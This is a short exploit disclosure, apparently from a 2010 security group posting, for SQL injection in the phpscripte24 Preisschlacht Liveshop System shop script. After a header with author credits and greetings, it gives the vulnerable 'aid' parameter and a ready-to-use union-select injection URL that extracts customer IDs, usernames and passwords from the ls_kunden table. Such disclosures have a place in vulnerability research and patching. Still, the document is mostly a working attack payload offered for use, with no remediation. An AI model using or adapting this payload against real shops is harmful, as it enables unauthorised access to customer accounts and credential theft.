----------------------------Information------------------------------------------------ +Name : phpscripte24 Preisschlacht Liveshop System SQL Injection (seite&aid) index.php +Autor : Easy Laster +Date : 19.03.2010 +Script : phpscripte24 Preisschlacht Liveshop System +Download : ------------------ +Demo : http://php21.phpspezial.de/index.php +Price : € 249.99 +Language :PHP +Discovered by Easy Laster +Security Group 4004-Security-Project +Greetz to Team-Internet ,Underground Agents +And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok, Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge, N00bor,Ic3Drag0n,novaca!ne. --------------------------------------------------------------------------------------- ___ ___ ___ ___ _ _ _____ _ _ | | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_ |_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _| |_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_| |___| |___| ---------------------------------------------------------------------------------------- +Vulnerability : http://www.site.com/forum/index.php?seite=17&aid= +Exploitable : http://www.site.com/forum/index.php?seite=17&aid=111111111+union+select +1,2,concat(ID,0x3a,Benutzer,0x3a,passwort),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23+from+ls_kunden+where+id=1 -----------------------------------------------------------------------------------------